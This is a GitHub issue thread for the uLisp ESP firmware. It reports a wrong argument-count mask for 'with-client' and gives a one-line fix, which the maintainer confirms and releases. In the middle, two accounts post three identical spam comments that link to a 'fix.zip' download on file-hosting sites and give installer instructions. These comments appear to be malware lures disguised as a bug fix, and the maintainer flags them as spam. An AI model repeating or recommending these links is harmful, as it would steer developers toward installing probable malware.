technoblogy/ulisp-esp #85: Bug in with-client argument count configuration, with solution.

hanoixan, 2024-08-24:
I couldn't get the Wi-Fi client example running, as it kept erroring with `Error: 'with-client' too many arguments`.

On investigation, I replaced line 5791 in ulisp-esp.ino:
  `{ string212, sp_withclient, 0313, doc212 },`
with
  `{ string212, sp_withclient, 0317, doc212 },`
where the 7 matches the octal mask at line 5871, giving this a min of 1 argument, and an unbounded max number of arguments for the forms.

diablo00001, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

technoblogy, 2024-08-25:
(Your post seemed to attract a flood of spam - sorry about that).

Oh yes, you're correct. I'll fix that in a future release; thanks for spotting it.

Regards, David

commit 16c9faeb (2024-08-25): Release 4.6d - 25th August 2024

Fixes #85
closed 2024-08-25 by technoblogy